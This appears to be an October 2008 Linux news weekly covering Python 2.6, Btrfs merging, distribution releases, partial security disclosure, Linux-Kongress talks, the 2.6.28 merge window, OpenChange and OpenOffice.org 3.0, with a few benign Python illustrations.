standardization.  In his professional life, he conducted a PhD on thread
scheduling on high-end machines, and is now a lecturer at the University of
Bordeaux.]

		Python 2.6 makes its debut


Version 2.6 of the Python language was
announced
on October 2, 2008.
A.M. Kuchling's extensive
What's New in Python 2.6 document covers the main goal of this
release:
"The major theme of Python 2.6 is preparing the migration path to Python 3.0, a major redesign of the language. Whenever possible, Python 2.6 incorporates new features and syntax from 3.0 while remaining compatible with existing code by not removing older features or syntax. When it's not possible to do that, Python 2.6 tries to do what it can, adding compatibility functions in a future_builtins module and a -3 switch to warn about usages that will become unsupported in 3.0."


Python 2.6 marks some changes in the language's development process:
"While 2.6 was being developed, the Python development process underwent two significant changes: we switched from SourceForge's issue tracker to a customized
Roundup
installation.."


Python 2.6 also included a switch to the
reStructuredText
documentation format via the
Sphinx Python documentation generator.  A.M. Kuchling explains the reason for the move:
"The Python documentation was written using LaTeX since the project started around 1989. In the 1980s and early 1990s, most documentation was printed out for later study, not viewed online. LaTeX was widely used because it provided attractive printed output while remaining straightforward to write once the basic rules of the markup were learned.
Today LaTeX is still used for writing publications destined for printing, but the landscape for programming tools has shifted. We no longer print out reams of documentation; instead, we browse through it online and HTML has become the most important format to support."


Numerous changes have been made to the Python language
and its large collection of modules.
Many of these changes came through the
Python Enhancement Proposal (PEP) system including:


PEP 343: the "with" statement.
 
PEP 366: main module explicit relative imports.
 
PEP 370: per-user site-packages directory.
 
PEP 371: addition of the multiprocessing package to the standard library.
 
PEP 3101: advanced string formatting.
 
PEP 3105: make print a function.
 
PEP 3110: catching exceptions in Python 3000.
 
PEP 3112: byte literals in Python 3000.
 
PEP 3116: new I/O library.
 
PEP 3118: revising the buffer protocol.
 
PEP 3119: introducing abstract base classes.
 
PEP 3127: integer literal support and syntax.
 
PEP 3129: class decorators.
 
PEP 3141: a type hierarchy for numbers.
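
Several of the features on this list can be seen together in a short sketch.
The names used here (register, Shape, Square, demo) are invented for
illustration and do not come from the release notes.  The code is written so
that it should run on Python 2.6 as well as on 3.x, which is why the abstract
base class is built by calling ABCMeta directly rather than through either
version's metaclass syntax.

```python
import abc
import io
from fractions import Fraction  # new in 2.6; part of the PEP 3141 tower
from numbers import Rational


def register(cls):
    """PEP 3129: a class decorator; this one only tags the class."""
    cls.registered = True
    return cls


# PEP 3119: an abstract base class with one abstract method.  Calling
# ABCMeta directly keeps the sketch valid on both 2.6 and 3.x.
Shape = abc.ABCMeta("Shape", (object,), {
    "area": abc.abstractmethod(lambda self: None),
})


@register
class Square(Shape):
    def __init__(self, side):
        self.side = side

    def area(self):
        return self.side ** 2


def demo():
    results = {}
    # PEP 343 and PEP 3116: "with" manages a stream from the new io module.
    with io.StringIO(u"first line\nsecond line\n") as stream:
        results["first"] = stream.readline().strip()
    # PEP 3101: str.format(); 2.6 requires explicit field numbers.
    results["formatted"] = "{0} has area {1}".format("square", Square(3).area())
    # PEP 3110: the "except ... as ..." form of exception handling.
    try:
        Shape()  # abstract classes cannot be instantiated
    except TypeError as err:
        results["abstract"] = type(err).__name__
    # PEP 3112 and PEP 3127: byte literals, 0o octal and 0b binary literals.
    results["literals"] = (len(b"abc"), 0o17, 0b101)
    # PEP 3141: Fraction is registered in the numeric type hierarchy.
    results["rational"] = isinstance(Fraction(1, 3), Rational)
    return results


if __name__ == "__main__":
    for key, value in sorted(demo().items()):
        # A single-argument print(...) behaves the same with or without
        # the print function of PEP 3105.
        print("%s = %r" % (key, value))
```

On 2.6 itself, print only becomes a true function after a
"from __future__ import print_function" line at the top of the module; that
line is left out here to keep the sketch minimal.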


Many new modules were added and a lot of existing modules were extended
in Python 2.6.
The list includes: ast (abstract syntax tree), future_builtins,
json (JavaScript object notation), plistlib (property list parser),
ctypes, and ssl.
A number of modules were deprecated in this release,
including: audiodev, bgenlocations,
buildtools, bundlebuilder, Canvas, compiler, dircache, dl, fpformat,
gensuitemodule, ihooks, imageop, imgfile, linuxaudiodev, mhlib, mimetools,
multifile, new, pure, statvfs, sunaudiodev, test.testall, and toaiff.
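
As a brief illustration of two of the new modules, the following sketch uses
json to round-trip a small record and ast to inspect source code without
executing it.  The helper names (round_trip, called_names, safe_literal) and
the sample data are made up for this example.

```python
import ast
import json


def round_trip(record):
    """Serialize a record to JSON text and parse it back."""
    text = json.dumps(record, sort_keys=True)
    return text, json.loads(text)


def called_names(source):
    """Return the sorted names of functions called directly in source."""
    tree = ast.parse(source)
    names = set()
    for node in ast.walk(tree):
        # Only plain-name calls such as len(x); method calls are skipped.
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            names.add(node.func.id)
    return sorted(names)


def safe_literal(text):
    """Evaluate a Python literal without running arbitrary code."""
    return ast.literal_eval(text)


if __name__ == "__main__":
    print(round_trip({"release": "2.6", "peps": [343, 371]})[0])
    print(called_names("x = len(open('f').read())"))
    print(safe_literal("[1, 2, {'a': 3}]"))
```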


Finally, there were many minor module changes, C API changes,
optimizations, interpreter changes and platform-specific changes to
Python 2.6.  Python continues to be a live and evolving language;
this release represents a fairly large set of changes that will pave
the way forward to Python 3.


		Btrfs to the mainline?


One of the kernel projects that seems to be attracting a fair amount of
attention these days is the new, copy-on-write filesystem, Btrfs.  While still rather
immature—the disk format is slated to be finalized by the end of the
year—Btrfs has reached a point where lead developer Chris Mason wants
to start talking about when to merge it
into the mainline.  Some are advocating moving quickly, while others are a
bit more skeptical that merging it will lead to faster development.


Merging Btrfs would have a number of advantages, but more eyes is what
Mason is seeking:

But, the code is very actively developed, and I believe the best way to
develop Btrfs from here is to get it into the mainline kernel (with a
large warning label about the disk format) and attract more extensive
review of both the disk format and underlying code.

The Btrfs developers are committed to making the FS work and to working
well within the kernel community.  I think everyone will be happier with
the final result if I am able to attract eyeballs as early as possible.


Typically, kernel code is not merged until it is ready, but an argument can
be made that filesystems, like device drivers, are
sufficiently isolated from the rest of the kernel that an early inclusion
will do little harm.  Also, a kind of precedent was set by the early "merge" of
ext4, though that was an evolution of the existing ext3 filesystem, while
Btrfs is entirely new.  Andrew Morton has been encouraging Mason to get 
Btrfs "into linux-next asap and merge it into 2.6.29."  He
describes his reasoning:


My thinking here is that btrfs probably has a future, and that an early
merge will accelerate its development and will broaden its developer base. 
If it ends up failing for some reason, well, we can just delete it
again.

For various reasons this approach often isn't appropriate as a general
policy thing, but I do think that Linux has needed a new local
filesystem for some time, and btrfs might be The One, and hence is
worth a bit of special-case treatment.


Adrian Bunk is not convinced that an early
merge will bring the benefits that Morton is touting.  He points to an early ext4 development plan,
noting that the timelines outlined in that message were, perhaps, overly
optimistic. "When comparing with what happened in reality it kinda
disproves your 'acceleration' point."


There is a difference, though, between ext4 and Btrfs, that Serge Hallyn points out:

OTOH, maybe it's just me, but I think there is more excitement around
btrfs.  Myself I'm dying for snapshot support, and can't wait to try
btrfs on a separate data/scratch partition (where i don't mind losing
data).  btrfs and nilfs - yay.  Ext4?  <yawn>  That can make all the
difference.


The original timeline showed mid-2007 as a target for a stable ext4
filesystem, but the project overshot that by a year or so.  A recent patch
proposes renaming ext4dev to ext4 because it "is getting stable
enough that it's time to drop 
the 'dev' prefix."  Unexpected difficulties led to
ext4 development taking longer, as Mason describes: 

Ext4 has always had to deal with the ghost of ext3.  Both from a
compatibility point of view and everyone's expectations of stability.  I
believe that most of us underestimated how difficult it would be to move
ext4 forward.


Many seem to think that Btrfs is different, but it still has a ways to go.
Currently, it does not handle I/O errors very well, while running out of
space on 
the disk can be fatal.  But it is getting close to usable—at least for
testing and benchmarking.  Getting the code into the mainline would cause
more folks to look at it, as well as test various filesystem changes
against it.  Mason gives an example of how that can work:

For example, see the streaming write patches I sent to fsdevel last
week.  I wouldn't test against ext4 as often if I had to hunt down
external repos just to get something consistent with the current
development kernels.  ext4 in mainline makes it much easier for me to
kick the tires.


Btrfs has an aggressive
schedule that targets a 1.0 release this year.  The focus of that release
is to nail down the on-disk format so that changes after that point will be
backward compatible.  Given that 2.6.29 will likely be released in
early to mid-2009, it seems quite possible that Btrfs will be "merge-worthy" by
then, which means that it really is not premature to start considering it
now.


		New Release Season


Right now there are several major distributions preparing new releases.
Ubuntu, openSUSE, Mandriva and Fedora are all on semi-regular six-month
schedules, releasing each spring and fall.  Debian has a much longer
schedule, but that project is also nearing the release of Debian 5.0
"Lenny".

Ubuntu 8.10 "Intrepid Ibex" is due for a final release on October 30,
2008.  Some new features have been added since the release of Ubuntu 8.04 "Hardy Heron".
Some highlights include GNOME 2.24 with tab support in the Nautilus file
manager and new file types supported by File Roller.  X.Org 7.4 has better
support for hot-pluggable input devices such as tablets, keyboards, and
mice.  Ubuntu 8.10 Beta includes Linux kernel 2.6.27, a release with better
hardware support and numerous bug-fixes.  The ecryptfs-utils package has
been included with support for a secret encrypted folder in your Home
Folder.  The "Last successful boot" recovery entry retains a copy of your
running kernel and makes it available from the boot loader as a "Last
successful boot" option.  Network Manager 0.7 has
some new features that are included in this release.  There are also a few
known issues with the beta release, so check the wiki before
installation.

openSUSE 11.1 is currently at beta 2.  Some changes since the first beta
include VirtualBox 2.0.2, the disabling of the Intel e1000e driver,
OpenOffice.org 3.0RC2 from the openSUSE
build service, plus GNOME 2.24.0, KDE 4.1.2, Mono 2.0 RC 3, Compiz 0.7.8,
and more.  You can see an expanded package
list for the factory tree at DistroWatch.  Just scroll down to see all
the packages with version numbers.  You can also find out more about
openSUSE 11.1 on this
page, which includes links to the most
annoying bugs and the roadmap which calls for a
final release on December 18, 2008.

Mandriva 2009.0 "sophie" may already have been officially released, since it is
due on October 9, 2008.  The second release candidate
wiki site lists some major new features including improved boot speed,
support for LUKS encrypted partitions in installer and diskdrake, improved
support for netbook hardware, support for Intel G41 graphics chipset, and
GNOME 2.24 final.  KDE4 is the default desktop for sophie.  You can find
out more about KDE/Mandriva integration here.  The 2009.0
Development page has more information.

Fedora 10 "Cambridge" is currently scheduled for
release on November 25, 2008.  The accepted
feature list for F10 includes an AMQP
infrastructure that makes it easy to build scalable, interoperable,
high-performance enterprise applications.  F10 also has better printing,
better remote support, faster startup, the Echo Icon Theme, Eclipse 3.4,
GNOME 2.24, RPM 4.6, the Sugar desktop (used in OLPC), and much more.

Debian 5.0 "lenny" was originally scheduled for release in September.  Now
the release date is "when it's ready", which should be soon.  We covered lenny in the July 31st edition, at the
freeze.  "Now to explain what,
exactly, we mean by "freeze".  The freeze upload policy of uploading
changes in through unstable if possible will be continued to apply until
the release."  Since then there has been lots of bug fixing.  See
more in the Debian "lenny"
Release Information page.  Debian 5.0 won't have the newest packages,
unlike the distributions mentioned above, but when Debian 5.0 is declared
stable you will have just that: a stable system that will be supported for
several years.

		Partial disclosure


We are increasingly seeing disclosures of security vulnerabilities that
don't actually disclose much, except that the researcher has found
something.  Unfortunately, we have also seen lots of evidence that once the
presence of a flaw is known, it doesn't take very long for folks to figure out
what the vulnerability is.  Of course, we don't have any data on how long it
takes those with a malicious intent to find the flaws, but clearly the
"white hats" find them quickly.  So what or who, exactly, are those practicing
"partial disclosure" protecting?


Partial disclosure is clearly a part of the "security circus" that Linus
Torvalds recently castigated, as it serves to increase the notoriety of
security researchers, without necessarily doing anything to help protect
users.  Several recent examples come to mind of researchers who have found
real flaws, but for various reasons don't want to disclose the details.
Instead they "tease" the world by talking around what they found,
trying—and generally failing—to leave out enough information so
that others can't immediately follow in their footsteps.


Dan Kaminsky's DNS flaw was
an interesting example in that Kaminsky only disclosed the vulnerability to
affected software vendors, allowing them multiple months to produce
patches.  He then wanted to give administrators time to apply the patches
so he delayed disclosing the flaw for another month or so.  He also had an
admittedly selfish reason for delaying disclosure: he wanted to announce it
at the Black Hat security conference.  


Because of the addition of source port randomization as the fix, it didn't
take very long for other security researchers to come up with the
vulnerability.  Attackers may have come up with it even more quickly, but
because there were no details available, developers of other, smaller DNS
servers—not privy to the initial disclosure—were unable to
determine whether their code was vulnerable.  It is commendable that
Kaminsky worked with the vendors to fix the problem, but there were clearly
holes in his disclosure methods.
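
A rough calculation hints at why source port randomization was an effective
fix, and why its appearance in patches was such a strong clue.  The sketch
below assumes an attacker who cannot see the resolver's traffic and so must
guess the 16-bit DNS transaction ID along with the source port of the query.
The figure of 60000 usable ports is an assumption chosen for illustration, not
a number taken from any particular resolver.

```python
import math

TXID_BITS = 16  # DNS transaction IDs are 16-bit values


def guess_space(port_count=1):
    """Number of (transaction ID, source port) pairs a blind spoofer faces."""
    return (2 ** TXID_BITS) * port_count


def extra_bits(port_count):
    """Bits of unpredictability added by choosing among port_count ports."""
    return math.log(port_count, 2)


if __name__ == "__main__":
    ports = 60000  # assumed size of the randomized port range
    print("fixed port:       %d combinations" % guess_space())
    print("randomized ports: %d combinations" % guess_space(ports))
    print("extra bits:       %.2f" % extra_bits(ports))
```

With a single, predictable port the attacker has only 65536 transaction IDs to
try; spreading queries over tens of thousands of ports multiplies that space
by the number of ports in use.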


A worse case can be seen with the recent spate of reports about
"clickjacking".  It started with a report
of a canceled talk at the OWASP AppSec conference.  The name is
clearly suggestive of where the vulnerability might be, and the description
of the canceled talk gave enough information that others
were able to duplicate it.  This led one of the original researchers to
release
the vulnerability information.


So, in the interim, there was enough information floating around to find and
exploit the flaws, and now the vulnerability info has been released, but
there are no fixes available for many of them.  It is hard to see what
delaying the disclosure did for anyone—researchers or
users—here.  It did generate lots of press, though, partially because
of the name, as Bruce Schneier pointed
out pre-disclosure: 

"Clickjacking" is a stunningly sexy name, but the vulnerability is really
just a variant of cross-site scripting. We don't know how bad it really is,
because the details are still being withheld. But the name alone is causing
dread.


Yet another recent example is the denial
of service reported for nearly any TCP device.  Like clickjacking, it
is being described in scary ways—which may well be justified:

Robert and I talk a lot, and I asked him if he'd be willing to DoS us, and
he flatly said, "Unfortunately, it may affect other devices between here
and there so it's not really a good idea." Got an idea of what we're
talking about now? This appears not to be a single bug, but in fact at
least five, and maybe as many as 30 different potential problems. They just
haven't dug far enough into it to really know how bad it can get. The
results range from complete shutdown of the vulnerable machine, to dropping
legitimate traffic.  


There may well be enough information in the description of what the
researchers found—and, in particular, how they found it—for an
enterprising attacker to find it for themselves.  In the meantime, the rest of
us are left in the dark.  Security researchers are clearly under no
obligation to disclose their research sensibly, but it would seem
that either releasing all the details at once, or keeping them completely
secret, would be better than these partial disclosures.


		LK2008: The values of the Linux community


The opening keynote speaker for the 2008 Linux-Kongress was James
Bottomley, who presented his views on the Linux community's values.  What these
values are, says James, is not entirely obvious.  Related groups - the free
software community, for example - have well-articulated value systems which
define them.  The Linux community's values are not so clearly expressed,
but, he says, they are central to what we do.


James started with a bit of history, noting that the initial value placed on
software was entirely commercial.  Once the industry realized that software
could be worth far more to its users than it costs to create, the
proprietary mode became dominant - and that has affected the evolution of
programming in general.  The value placed on the code by its developers
became irrelevant, leading to "paycheck coding."  There is no value placed
on creativity, and such a model leads to bad code.


Eventually Richard Stallman came along and challenged the commercial view
of software.  But, during this time, about the only alternative to
commercial software was the BSD Unix distribution, and that got caught up
in the lawsuit by AT&T.  So closed software took over; Windows won on
commodity platforms, but proprietary software also became dominant in the
Unix arena.


In 1991, Linux hit the scene; since then, it has become the most popular
and vibrant free software operating system available.  In a sense, this is
interesting, in that Linux is licensed under the GPL, a license that many
companies hate.  Apple explicitly chose BSD as the base for Mac OS to
avoid GPL-licensed code.  But, despite this antipathy, lots of companies
use Linux, and even contribute to its development.  It is interesting,
James says, to look at why that is.


The reason is the Linux community's values.  In particular, the community
prizes technical merit above all other considerations - including small
things like what any company or user would like to have.  Also prized is
passion; code supported by a developer who clearly cares about it will
generally fare better in the review process.  If the code quality and the
passion are there, the community does not care about much of anything
else.  Factors like the source of the code or who might benefit from its
incorporation don't really matter.


In particular, contributors to the kernel are not required to sign on to
any particular belief system or any specific view of freedom.  A
contributor may have an FSF-like belief in free software, or, instead, be a
corporate developer who does not care about software freedom at all.  Even
the BSD community requires acquiescence with a specific view of freedom.  A
Linux contributor, instead, need only be willing to contribute the code
under the share-alike rules of the GPL.


As a result, anybody can play with Linux, regardless of philosophy or
corporate status.  We have a community which is defined by contributions,
not by a specific set of values regarding software freedom.  That has
allowed the formation of a very diverse community with a specific shared
interest: creating the best kernel we can.


There are some significant benefits from this approach.  It forces
companies to recognize their engineers' values; that, in turn, makes for
more motivated developers.  Developers who are interested in improving
Linux can get resources and support from corporations.  Users get
high-quality code from developers who care about what they are doing.
Companies get the ability to focus on their little piece of the problem
while taking advantage of the community-maintained kernel for the rest;
they can also offload their older code to the community for long-term
maintenance.


James compared the Linux way of doing things with the US constitution.
That document only mentions freedom three times, yet it has become a
blueprint which has supported freedom for over 200 years.  It is a
relatively short document.  The proposed EU constitution, instead, is about
20 times the length, before taking into account other documents which are
referenced.  That document would appear to be somewhat bloated; the goals
would be better served by a more concise formulation.

Similarly, the Linux community spends little time talking about freedom.
Instead, the focus is on a set of brief principles involving code quality
and passion.  Freedom is not legislated; it arises as an emergent
value inherent in the Linux way of doing things.  Linux has managed to
bring about software freedom without talking about it, and without imposing
a view of software freedom on its contributors.  In the process,
Linux has succeeded in creating something which is as free as - or more free
than - the GNU system envisioned by the Free Software Foundation.

During the question period, James wished for a free software advocate who
would argue the point with him, but no such person emerged.  He will, it
seems, have to repeat the talk in a different venue before he can have that
debate.

		Merged for 2.6.28


As of this writing, 4193 non-merge changesets have been incorporated for
the 2.6.28 kernel.  In other words, this merge window is just beginning,
having merged probably less than half of the patches which will eventually
find their way into the mainline.  What we see so far are a lot of drivers
and incremental improvements, but not many major changes.


User-visible changes for 2.6.28 include:


 There are new drivers for Analog Devices SSM2602, AD1882A and AD1980 codecs,
     Freescale MPC5200 I2S audio devices,
     Texas Instruments TLV320AIC26 codecs,
     Tascam US-122L USB Audio/MIDI interfaces,
     Wolfson Micro WM8580, WM8900, WM8903, and WM8971 audio devices,
     Blackfin SPORT peripheral interface controllers,
     NVIDIA HDMI HD-audio codecs,
     Toshiba RBTX4939 MIPS boards,
     Atheros L2 10/100 network adapters,
     Cisco 10G Ethernet adapters,
     JMicron JMC250 chipset-based network adapters,
     QLogic QLGE 10Gb Ethernet adapters,
     SMSC LAN95XX based USB 2.0 10/100 ethernet devices,
     AFEB9260 ARM-based boards (an open source board design),
     Arcom/Eurotech VIPER boards,
     AT91SAM9X watchdog devices,
     ITE IT8716, IT8718, IT8726,  and IT8712 Super I/O watchdogs,
     W83697UG/W83697UF watchdog devices,
     TLV320AIC23 codecs,
     Micron MT9M111 camera chips,
     Magic-Pro DMB-TH tuners,
     Afatech AF9015 and AF9013 DVB-T USB2.0 receivers,
     Conexant cx24116/cx24118 tuners,
     DVB cards based on SDMC DM1105 PCI chip,
     Silicon Laboratories SI2109/2110 demodulators,
     ST STB6000 DVBS Silicon tuners,
     numerous Fujifilm FinePix cameras,
     ALi  video camera controllers,
     WM8400 AudioPlus HiFi codecs, and
     SGS-Thomson M48T35 Timekeeper RAM chips.


 Support for the old Sun 4 architecture and ColdFire serial ports has
     been removed. 

 There is a new sysfs file (unload_heads) which can be 
     used by a user-space process to tell an ATA disk to retract its heads
     and prepare for an impact.  When used in conjunction with an
     accelerometer, this feature could be used to attempt to preserve a
     disk in a falling laptop.

 Improved support for ptrace() - and support for precise event-based
     sampling in particular - has been added for the x86 architecture.

 The crypto subsystem has gained support for deterministic ANSI X9.31
     A.2.4 pseudo-random number generation.

 The SMACK security module can now be configured to enforce mandatory
     access control rules on privileged processes.

 There is a script which can be used to generate a minimal "dummy"
     policy for SELinux.  The smallest workable policy, it seems, is 587
     lines long.

 Some sound devices can detect the presence of audio devices on input
     and output jacks.  The ALSA layer now allows drivers for those devices
     to register those jacks and report the presence of devices attached to
     sound cards through the input layer.

 Work with multiqueue networking continues; 2.6.28 will include the
     ability to associate a separate queueing discipline with each internal
     packet queue.

 The wireless regulatory
     compliance subsystem has been merged.

 The kernel now supports the Phonet packet protocol  used by
     Nokia cellular modems.  See networking/phonet.txt in the kernel
     documentation directory for more information.

 Also added to core networking is support for the Distributed Switch
     Architecture protocol, with initial support for a number of Marvell
     switch chips.

 The netfilter layer has been augmented to support network namespaces.

 The ext4 system has lost the "ext4dev" name; this is a signal that the
     developers are getting ready to declare it ready for production use.
     Ext4 has also gained a set of static tracepoints for use with
     SystemTap or other tracing tools.

 The FIEMAP ioctl() for extent mapping has been added.

 Xen has added CPU hotplugging support.

 Version 4 of the rpcbind protocol is now supported; this enables the
     kernel to offer RPC services via IPv6.

 The OCFS2 filesystem has gained a number of features, including POSIX
     locks, extended attributes, and use of the JBD2 journaling layer.
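
Of the items above, the unload_heads file lends itself to a short sketch of
how a user-space daemon might use it.  The code below assumes that the
attribute lives at /sys/block/<disk>/device/unload_heads and that the value
written is a timeout in milliseconds; both details should be checked against
the kernel documentation for the running kernel.  The function names are
invented for this example, and a real daemon would be driven by accelerometer
events rather than called by hand.

```python
import os


def unload_heads_path(disk, sysfs_root="/sys"):
    """Build the assumed sysfs path of the unload_heads attribute."""
    return os.path.join(sysfs_root, "block", disk, "device", "unload_heads")


def request_head_unload(disk, timeout_ms, sysfs_root="/sys"):
    """Ask the disk to park its heads for timeout_ms milliseconds.

    The units and path are assumptions; writing to the real file
    normally requires root privileges.
    """
    if timeout_ms < 0:
        raise ValueError("timeout_ms must not be negative")
    path = unload_heads_path(disk, sysfs_root)
    with open(path, "w") as attr:
        attr.write("%d\n" % timeout_ms)
    return path


if __name__ == "__main__":
    # Shows the path that would be written for an example disk name.
    print(unload_heads_path("sda"))
```

Taking sysfs_root as a parameter allows the function to be exercised against a
scratch directory instead of a real disk.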


Changes visible to kernel developers include:


 Discard request 
     and request timeout handling have been added to the block layer; a
     number of other internal API changes have been made as well.  See this article for details.

 Video4Linux2 drivers no longer have their open() function
     called with the big kernel lock held.  The lock_kernel()
     calls have been pushed down into individual drivers within the
     mainline tree; external drivers will need to be fixed.


The merge window is likely to remain open until approximately
October 24.

		Connecting to Microsoft Exchange with OpenChange


Working with a Windows network from Linux has never been a smooth ride.
While Samba, Wine and OpenOffice.org have made many components workable, connecting to the Microsoft Exchange email server has remained unreliable. Now the OpenChange developers hope to change that, providing the same capabilities as Microsoft Outlook in a range of Linux-native clients like Kontact and Evolution.
OpenChange is not yet workable, but partial operation can demonstrate
its potential.


If you want to connect to Exchange at the moment, you have a few options. Evolution can connect using a hack with Outlook Web Access, providing email, shared folders, calendars and contacts. But it's far from reliable; I tried to get by with it at the office, warts and all, and managed it for a couple of weeks before resigning myself to Windows. The other options are even worse -- just use the webmail client, or use the IMAP server for email and hacks such as this one to get at other data in a manner similar to Evolution. Working from home on Kubuntu, I find it easier to just use the webmail client.


OpenChange is taking a much more sensible approach. At the heart of the project is a MAPI-compatible API, which allows clients to talk directly to Exchange and access all of its functionality. The code is still being actively developed, but some application developers have started playing around with it; the first code for Evolution came out in January 2008. According to Brad Hards, an OpenChange and Kontact developer, "OpenChange can do most of the Exchange tasks now, though it can't currently do free/busy."


For the curious, OpenChange developer Julien Kerihuel has written a simple command-line client. It's currently available in Ubuntu Intrepid and Debian Experimental, though you're better off compiling it yourself as it is changing quite rapidly. It isn't especially well documented, and the manpage implies some functionality that Kerihuel is still working on, but I did have some success.


First, you need to set up a new profile:


You can check if it has worked by listing your mailboxes:


I managed to send a test email, which I picked up in Outlook without problems. When I opened the same email in KMail, however, it had a "winmail.dat" binary file attached, which you wouldn't normally get in emails from Outlook.


You can also interrogate folders, send emails, create and delete contacts, calendar appointments and access most of the other Exchange functionality. Kerihuel: "Openchangeclient is a test case for libmapi, it's a useful way to test if a problem is in the client application or in libmapi, and there is a plugin for sugarcrm, so it may remain in future." There's a proxy server using Samba too, for those who want yet another way of connecting.


For Kontact users, usable integration is probably a good 6 months away. The akonadi resource can deal with most of OpenChange's functionality, "at least a bit", according to Hards, though "Kontact can't currently make use of it because it isn't converted to akonadi yet." KDE 4.2 should come out with akonadi integration, but the OpenChange functionality might not yet be stable enough for large quantities of important data. Hards thinks KDE 4.3 is probably "the sweet spot."


Until then, Ballmer's mantra remains relevant; OpenChange and its client implementations could do with developers, developers, developers. Cracking this nut could throw open Exchange to a new range of clients, and as Kontact and its peers become stable on Windows and Mac OS X, an entrenched Windows server will pose less of a threat to free software migrations on desktops.


		LK2008: Embedded and Mobile Linux


Linux-Kongress 2008 attendees had the opportunity to hear two different
sessions dedicated to organizations trying to improve the state of Linux
support for embedded and mobile systems.  They have similar goals, but are
taking different approaches and have different levels of resources
available to them.


The first of these is OpenSourceEmbedded, presented by uClinux developer
Jeff Dionne.  He opened with a statement that, ten years ago, Linux-based
embedded systems were nearly unknown.  Now those systems are everywhere,
with hundreds of millions of deployments.  Embedded systems, he says, make
up the largest installed base of Linux systems.

All is not perfect, though, in the embedded sphere.  Linux still has an
uncomfortably 
large footprint for embedded use.  There is also no unified distribution
for embedded use; instead, the industry is full of homemade solutions made
by vendors.  He would like to address this situation through the creation
of a next-generation platform.  It would take the form of a kit that
developers could start with which comes equipped with design examples for a
number of applications: telephones, digital video recorders, etc.

There are two hardware platforms being targeted initially by this effort.
One is a Plasma MIPS processor - a very simple device which can be
implemented with an FPGA.  A simulator for this processor runs about 600
lines of code.  The other, more advanced platform is a LEON 2/3 SPARC
processor, a full system with a memory management unit and which supports
multiprocessor configurations.  Examples of the first processor include a RealTek
MIPS system, while the LEON SPARC CPU is similar to current SuperH 3
processors.  The Plasma and LEON SPARC processors are being designed now,
with the intent of producing them as open hardware designs.

On top of these processors will be a base operating system layer with a
"mini-POSIX" environment.  There will be an interesting packaging system
which stores components as separate "blocks" in flash, outside of any
filesystem.  The running system will be assembled from the blocks by the
boot loader.  This organization is designed to avoid bricking; any bad or
corrupted components can simply be bypassed without affecting the
functioning of the rest of the system.  This, evidently, is how PalmOS did
things. 

The next challenge is creating a community around this whole effort.  To
that end, resources are to be put up at opensourceembedded.org - though
nothing is available as of this writing.  The site will include project
hosting, along with the ability to download the development kits.  Jeff
says that the uClinux experience has shown that the kit approach works;
with a ready-to-use code base like that, a community can come together.

There are also plans to create an organization behind this effort which,
among other things, can enter into non-disclosure agreements with hardware
manufacturers.  This organization will also work to help vendors ship
GPL-compliant products.

OpenSourceEmbedded appears to be in an early state, so it's hard to make
any guesses about how successful it will be.  For more information, see Jeff's slides
[PDF]. 

Mobile Linux

The closing session at the 2008 Linux-Kongress was a talk by Dirk Hohndel,
who began by noting that Linux-Kongress is, in fact, the oldest Linux
event.  It was first held in 1994, and hosted many of the kernel developers
who were active at that time; Dirk estimates that about half of the
development community was to be found in a single room.  It would take a
rather larger room to accomplish that now.  Dirk complimented the event on
its avoidance of commercialism and its sustained focus on the technology.

The technology that Dirk came to talk about was mobile Linux.  He started
by expressing his disappointment with desktop Linux.  It has become a
collection 
of poorly-integrated applications which are somehow trying to replicate
Windows 95.  The result does not work well on the desktop, and it
most certainly is not optimized for the mobile environment.

But, says Dirk, mobile Linux is not really embedded Linux either.  Embedded
Linux evokes images of access points and other single-application boxes
which are not meant to be extended past a single function.  They are not
concerned with the user's experience, and they are not concerned with
mobility.  The subject here is devices with a screen, and which can have
new applications installed onto them.  So some sort of desktop-like
interface is needed, but current desktop Linux does not fill the bill.

According to Dirk, the problem with desktop Linux is the fundamental
approach: developers are not the target audience for this software, but
they are making all the interface decisions.  What's needed is input from
people who are specialized in interface design and human-computer
interaction.  That leads to a "scary thought": interface specialists are
generally not coders, but they will be making decisions that coders are
expected to implement.  That is not a normal mode of operation in the free
software community, but it is needed here.

Other problems include the proliferation of "80% done" projects.  Much of
the work has been done, but nobody wants to do the work to finish the job.
There are also far too many choices; in general, says Dirk, people do not
like it if they have to choose between more than two alternatives.  When
dealing with the Linux desktop, it's hard to find situations where there
are fewer than six choices.  And, overall, the Linux desktop lacks
consistency.  That, says Dirk, is why he uses an Apple laptop.  Apple
enforces a consistent design across the application space and, he says, the
result is very nice.


Devices should be simple and natural to use; such devices are increasingly
hard to find anywhere.  As an example, he held up a paper notebook.  The
device boots very quickly and has a nice "touch-based" pencil-oriented
interface.  No manuals or explanations are needed.  Linux-based devices
should be just as easy to use.  But, at the same time, they need to offer
an experience which is close to what people expect from an ordinary
desktop computer.  They should have access to the Internet, and users should
be able to install software.


Dirk then pulled out an Eee PC system and gave the five-second boot demonstration.
This work, he says, is an example of what is being done by Intel in support
of the Moblin project.  Intel is
trying to solve some of the hardest problems in the mobile space,
contributing the results for everybody to use.

To that end, Moblin is working toward the creation of a base distribution
for mobile systems.  The user interface will be based on the GNOME mobile
work, but with a lot of enhancements.  The end goal is the creation of a
Linux distribution for mobile devices which is far better than the
state of the art today.  It is not, he says, an attempt to compete with
distributors; instead, Moblin is providing a base which the distributors
can build on.  Intel's effort will naturally focus on Intel processors, but
contributions for any architecture are welcome at Moblin.


In conclusion, Dirk noted that Linux's success on the server side was
relatively easy.  The mobile problem is much harder.  Intel is hoping that
others will join in to help Moblin reach its rather ambitious goals.

		OpenOffice.org releases 3.0, faces new challenges


A new version of the popular free software office application suite,
OpenOffice.org (OOo) 3.0, was released this week to lots of
press and enough download traffic to bring down its webserver.  While the
release isn't a huge leap 
forward in terms of features, it does provide some compelling
enhancements.  Perhaps the most interesting is the increased focus on
extensions, a la Firefox, that don't require modifying the core OOo
code.  This may help combat the problem—or perceived
problem—that Sun is stifling OOo development through its bureaucratic
procedures for adding new functionality.


The first thing one notices when starting up OOo 3.0 is the new splash screen,
but it appears for only a short time.  One of the major complaints about
the suite has been how long it takes to start up—something that has
been addressed in 3.0.  The application opens to a new welcome screen (seen
at left) that presents a more friendly appearance, rather than an empty
window, for new users.  Once
past that point, the various tools look much as they did in OOo 2.4 and
earlier versions.


The other changes are mostly under the covers; they will be noticed by
power users, but are not immediately obvious to basic users.  These
include:

 Writer (word processor) has a new slider for zooming
 Writer allows multi-page display and editing
 Calc (spreadsheet) allows up to 1024 columns per sheet
 Draw (drawing) can handle poster-size files
 Impress (presentation) supports multiple monitors for
      presentations
